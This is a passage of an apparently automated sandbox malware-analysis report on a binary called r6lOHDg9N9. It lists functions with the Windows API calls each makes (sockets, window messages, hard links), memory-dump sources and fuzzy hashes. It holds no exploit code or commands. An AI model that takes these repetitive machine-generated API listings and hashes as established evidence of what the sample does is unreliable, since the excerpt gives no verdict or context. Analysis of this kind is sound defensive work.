                                                                              • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                              • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                              Function 0040EEE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,0040E5BF,?), ref: 0040EEEB
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                              • API String ID: 2574300362-192647395
                                                                              • Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                              • Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
                                                                              • Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                              • Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
                                                                              Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                                                                              • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                              • Opcode Fuzzy Hash: 3e9ce65d11b316350caf6cb0db2ee4373dc883206541589756c66e9508b68ec6
                                                                              • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                              Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __flush.LIBCMT ref: 00414630
                                                                              • __fileno.LIBCMT ref: 00414650
                                                                              • __locking.LIBCMT ref: 00414657
                                                                              • __flsbuf.LIBCMT ref: 00414682
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                              • String ID:
                                                                              • API String ID: 3240763771-0
                                                                              • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                              • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                              • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                              • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                              Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                              • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                              • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CopyVariant$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 2286883814-0
                                                                              • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                              • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                              • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                              • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                              Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                              • #21.WSOCK32 ref: 004740E0
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$socket
                                                                              • String ID:
                                                                              • API String ID: 1881357543-0
                                                                              • Opcode ID: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                                              • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                              • Opcode Fuzzy Hash: 34147ac461a0e284a181aa69957adffe558344c6371ca04fba36d93f3b76d486
                                                                              • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                              Function 00441CB4 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                              • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                              • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                              • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1352109105-0
                                                                              • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                              • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                              • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                              • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                              Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                              • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                              • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                              • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                              • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                              Function 0045D070 Relevance: 6.1, APIs: 4, Instructions: 100fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                              • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 3321077145-0
                                                                              • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                              • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                              • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                              • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                              Function 0045058D Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 004505BF
                                                                              • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                              • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                              • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Proc$Parent
                                                                              • String ID:
                                                                              • API String ID: 2351499541-0
                                                                              • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                              • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                              • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                              • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                              Function 004613E0 Relevance: 6.1, APIs: 4, Instructions: 90windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                              • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                              • __itow.LIBCMT ref: 00461461
                                                                              • __itow.LIBCMT ref: 004614AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow$_wcslen
                                                                              • String ID:
                                                                              • API String ID: 2875217250-0
                                                                              • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                              • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                              • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                              • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                              Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0040E202
                                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell__memset
                                                                              • String ID:
                                                                              • API String ID: 928536360-0
                                                                              • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                              • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                              • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                              • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                              Function 004727F8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetForegroundWindow.USER32 ref: 00472806
                                                                                • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                              • GetCaretPos.USER32(?), ref: 0047281A
                                                                              • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                              • GetForegroundWindow.USER32 ref: 0047285C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                              • String ID:
                                                                              • API String ID: 2759813231-0
                                                                              • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                              • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                              • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                              • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                              Function 0047721A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$AttributesLayered
                                                                              • String ID:
                                                                              • API String ID: 2169480361-0
                                                                              • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                              • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                              • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                              • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                              Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 00448CB8
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                              • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                              • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                              • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                              Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • select.WSOCK32 ref: 0045890A
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastacceptselect
                                                                              • String ID:
                                                                              • API String ID: 385091864-0
                                                                              • Opcode ID: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                                              • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                              • Opcode Fuzzy Hash: 4f99be09ea3748399bcd45f1fb284b1e509608db9923cba0f0141099163bafeb
                                                                              • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                              Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
